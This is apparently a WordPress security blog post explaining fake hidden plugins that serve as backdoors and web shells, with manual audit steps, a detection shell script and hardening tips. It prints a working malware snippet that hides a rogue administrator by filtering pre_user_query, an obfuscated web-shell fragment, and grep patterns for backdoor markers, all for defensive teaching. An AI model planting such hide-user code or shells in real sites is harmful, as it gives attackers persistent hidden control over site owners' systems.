Hidden Backdoors & Fake Plugins: How Hackers Live in Your WordPress Dashboard

Published on 1/1/2026
MD Pabel

When you log into your WordPress dashboard and look at your “Plugins” list, you trust what you see. You see Yoast SEO, WooCommerce, and Contact Form 7. Everything looks normal.

But what if I told you that you might have 15 plugins installed, but WordPress is only showing you 14?

In our recent security investigations, we have seen a massive rise in Fake Hidden Plugins. These are malicious scripts that disguise themselves as legitimate software. They don’t just sit there; they act as Backdoors and Web Shells, giving hackers total control over your website while remaining completely invisible to you.

In this post, I’m going to show you exactly how these fake plugins work, look at the code behind them (specifically wp-compat.php and OperationGraph.php), and teach you how to spot them.


1. The Disguise: “Wolves in Sheep’s Clothing”

Hackers know that if they name a malicious file hacker-script.php, you will delete it immediately. So, they use Social Engineering. They name their folders and files to sound incredibly boring and technical.

Here are three real examples we found in a recent cleanup:

  1. The Name: “WP Compatibility Patch” (wp-compat.php)
  2. The Name: “OperationGraph Framework” (OperationGraph.php)
  3. The Name: “Advanced Server Response Handler” (main.php)

To a non-technical site owner, these sound like essential system files. You might even be afraid to delete them, thinking you’ll break your site. That is exactly what the hacker wants.


2. The Backdoor: The “Ghost Admin” Trick

The most dangerous type of fake plugin is the Backdoor. A backdoor is simply a secret way to get back into a system after being kicked out.

The malware file wp-compat.php is a masterclass in this. It doesn’t hack your site; it keeps your site hacked.

How It Works

Most site owners think that if they get hacked, they just need to change their password. But wp-compat.php has a nasty trick. It creates its own Administrator account (often named adminbackup or support_user), but then it tells WordPress to hide that user from you.

The Code Analysis:
Look at this snippet from the malware:

add_action('pre_user_query', function($query) {
    global $wpdb;                               // the closure needs the global DB object for the table name
    if (!is_admin()) return;                    // only filter queries made from the dashboard
    $hidden_id = get_option('_pre_user_id');    // ID of the hidden admin, saved earlier by the malware
    // Appends a condition to the WHERE clause so the hidden user's row never comes back
    $query->query_where .= " AND {$wpdb->users}.ID != " . intval($hidden_id);
});

In plain English:

  1. The script creates a malicious admin user.
  2. It saves that user’s ID in the database.
  3. It hooks into the WordPress database query (pre_user_query).
  4. It tells the database: “When the site owner asks for a list of users, give them everyone EXCEPT this specific ID.”

You could be staring at your “All Users” screen, seeing 3 admins, while a 4th invisible admin is logged in simultaneously, uploading more viruses.



3. The Web Shell: Remote Control Obfuscation

While wp-compat.php is about access, OperationGraph.php is about Control. This script acts as a Web Shell.

A Web Shell is a script that allows a hacker to execute commands on your server remotely, just like they were sitting in front of your server’s terminal.

The Code: Obfuscation

If you open this file, you won’t see clean code. You will see a mess. This is called Obfuscation. Hackers use it to confuse security scanners and humans.

Example from the file:

goto r9Ie9y353w0aV7bK; 
eaa_xUioLZDbkthT: 
register_deactivation_hook(__FILE__, function () { ... });

Legitimate plugins almost never use goto statements or hex-escaped strings like \x6e\x69.... If you see a PHP file that looks like a cat walked across a keyboard, it is almost certainly a Web Shell.

What The Shell Does:

This script connects to a “Command and Control” (C2) server. It waits for instructions. The hacker can send a command to:

  • Inject SEO spam links into your footer.
  • Redirect your traffic to a scam site.
  • Send thousands of spam emails using your server.
  • Delete your entire database.

Because the code is “obfuscated,” simple virus scanners often miss it: they can’t read the keywords hidden inside the mess.


4. How to Detect Hidden Plugins (Manual Audit)

Since these plugins hide from the WordPress dashboard, you cannot find them by logging into your admin panel. You must go “under the hood.”

Step 1: Access the File Manager

Log in to your hosting cPanel or use FTP (FileZilla). Go to the folder:
/wp-content/plugins/

Step 2: Look for “The Usual Suspects”

Scan the folder names. Legitimate plugins usually have branded names (e.g., elementor, contact-form-7). Malware often uses generic names mixed with “WP” or “WooCommerce”:

  • wp-compat
  • wp-framework
  • woocommerce-view
  • assets-manager

Step 3: Check the “Last Modified” Date

This is the easiest giveaway.
If all your legitimate plugins were updated 2 months ago, but one folder says it was modified yesterday, investigate that folder immediately.

Step 4: Check the mu-plugins Folder

Go up one level to /wp-content/mu-plugins/.
“MU” stands for “Must Use.” Plugins in this folder run automatically and are not listed in the standard plugin list. Hackers love this folder. If you see files here that you didn’t put there (like loader.php or index.php), they are likely malicious.
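The file-level checks from Steps 2 to 4 above (plugin folders modified recently, anything sitting in mu-plugins, and PHP files carrying the goto, hex-escape and pre_user_query markers from sections 2 and 3) as one shell script. This is an added example, not code from the post or from 3Zero Digital; the function names, the 7-day window and the demo tree it builds are my own choices, and the demo file contents are made up.

```shell
#!/bin/sh
# Added audit helper (not from the post). Usage: sh wp-audit.sh /path/to/wp-content
# Hypothetical function names and a 7-day window; the demo tree below is constructed.

# Step 3 of the audit: plugin folders modified within the last 7 days.
recent_plugins() {
  find "$1/plugins" -mindepth 1 -maxdepth 1 -type d -mtime -7 | sort
}

# Step 4: every PHP file in mu-plugins runs without appearing in the Plugins screen.
mu_plugin_files() {
  if [ -d "$1/mu-plugins" ]; then
    find "$1/mu-plugins" -type f -name '*.php' | sort
  fi
}

# Sections 2 and 3: PHP files that use goto-based control flow, hex-escaped
# strings (\x6e\x69...) or hook pre_user_query. Treat hits as leads, not proof;
# read the file before deleting anything.
suspicious_php() {
  grep -rlE --include='*.php' \
    'goto [A-Za-z0-9_]+;|\\x[0-9a-fA-F]{2}|pre_user_query' \
    "$1/plugins" "$1/mu-plugins" 2>/dev/null | sort
}

# Constructed demo wp-content tree so the checks can be tried offline. Folder and
# file names follow the post; the file contents are made up.
make_demo_tree() {
  demo=$(mktemp -d)
  mkdir -p "$demo/plugins/contact-form-7" "$demo/plugins/wp-compat" \
           "$demo/plugins/OperationGraph" "$demo/mu-plugins"
  printf '<?php\n// ordinary plugin code\n' > "$demo/plugins/contact-form-7/wp-contact-form-7.php"
  printf '<?php\nadd_action("pre_user_query", function ($q) {});\n' > "$demo/plugins/wp-compat/wp-compat.php"
  printf '<?php\ngoto r9Ie9y353w0aV7bK;\n$s = "\\x6e\\x69";\n' > "$demo/plugins/OperationGraph/OperationGraph.php"
  printf '<?php\n// dropped loader\n' > "$demo/mu-plugins/loader.php"
  # The legitimate plugin was last touched years ago; the others keep today's timestamp.
  touch -t 202001010000 "$demo/plugins/contact-form-7"
  echo "$demo"
}

if [ "$#" -gt 0 ]; then
  echo "== Plugin folders modified in the last 7 days"; recent_plugins "$1"
  echo "== Files in mu-plugins"; mu_plugin_files "$1"
  echo "== PHP files with obfuscation/backdoor markers"; suspicious_php "$1"
fi
```

Pair the script with a direct look at the wp_users table in phpMyAdmin: a query against the table itself never passes through WordPress, so the pre_user_query hook cannot filter what you see there.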


5. Summary & Prevention

Hidden plugins are scary because they persist. You can change your passwords 10 times, but if the wp-compat.php file is still on your server, the hacker can walk right back in.

Your Action Plan:

  1. Don’t trust the Dashboard: If you suspect a hack, check the files via FTP.
  2. Delete weird users: Check your database (wp_users table) via phpMyAdmin for users you don’t recognize.
  3. Disable File Editing: Add define('DISALLOW_FILE_EDIT', true); to your wp-config.php file so a hacker who gets into your dashboard can’t use the built-in Theme/Plugin editor to write these scripts into your files (DISALLOW_FILE_MODS goes a step further and also blocks plugin and theme installs and updates from the dashboard).

Security is about layers. Understanding how these backdoors work is the first layer of defense in keeping your site safe.

About the Author

MD Pabel

MD Pabel is the Founder and CEO of 3Zero Digital, a leading agency specializing in custom web development, WordPress security, and malware removal. With 8+ years of experience, he has completed more than 3200 projects, served over 2300 clients, and resolved 4500+ cases of malware and hacked websites.